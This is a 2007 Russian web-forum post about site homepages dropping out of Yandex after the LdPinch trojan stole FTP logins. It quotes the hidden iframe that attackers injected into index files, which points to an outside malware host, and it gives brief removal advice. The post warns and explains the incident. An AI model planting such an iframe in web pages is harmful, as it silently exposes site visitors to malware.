Твой софтовый форум > WeB - Developments > Раскрутка сайта

Выпадение "морд" из Яндекса. Причина - вирус!

Дата публикации: 09.03.2007 - 11:16
PRYANIK
Последний апдейт Яндекса 6 марта по многочисленным обсуждениям на форуме был глюченным. Как всегда выпало часть морд, некоторые крепкие сайты повываливались из серпа, другие потеряли бэки. Вроде все как всегда… Однако…

Случайно было замечено, что некоторые морды повываливались из Яндекса по причине действия вируса. Да, да… именно вируса, а точнее троянца, как это ни странно

Trojan-PSW.Win32.LdPinch.bik — именно так называется троянец. Принцип действия очень прост. Троянская программа ворует логины, пароли пользователя для FTP-соединений прописанные в программах Total Commander, FAR, SmartFTP. Всю полученную информацию программа отправляет на электронную почту злоумышленника spartak***@mail.ru. Который в последствии, по предположениям, с помощью специального программного обеспечения в автоматическом режиме заходит на FTP сервера и прописывает в файл index лежащий в корне код с фреймом который ведет на вирус.

Код, который помещается в файл index:

CODE
<IFRAME name="StatPage1"
src="http://hard-tsunami.info/xep/in.php?adv=3"
width=5 height=5 style="display:none"></IFRAME>


После переиндексации такие морды напрочь выпадают из кэша поисковой системы. Однако это не самое страшное, потому как злоумышленник обладает доступом к вашему FTP серверу и может осуществлять с ним любые деяния. Последствия действия троянца каждый может себе представить.

Информационная справка
Trojan-PSW.Win32.LdPinch.bik - Троянская программа, относящаяся к семейству троянов, ворующих пароли пользователя. Предназначена для кражи конфиденциальной информации. Является приложением Windows (PE EXE-файл). Имеет размер - 25600 байт. Упакована при помощи UPX, распакованный размер - около 250 КБ. Написана на Ассемблере.

Рекомендации по удалению
Если ваш компьютер оказался заражен данным вирусом, то для его удаления необходимо:
Выгрузить из памяти компьютера активный троянский процесс
Удалить оригинальный файл троянца (его расположение на зараженном компьютере зависит от способа, которым программа попала на компьютер).

Ссылки по теме:
Один из случаев выпадения морды по причине вируса:
http://mastertalk.ru/topic22779.html

Подробная информация о трояне:
http://www.viruslist....virusid=147349

(с) mustofik
Infernus
на сколько я знаю, инфа правдива, вылетали целые сервера хостеров - с сотнями и более сайтов...


Для просмотра полной версии этой страницы, пожалуйста, пройдите по ссылке: Выпадение "морд" из Яндекса. Причина - вирус!
SoftoRooM © 2004-2024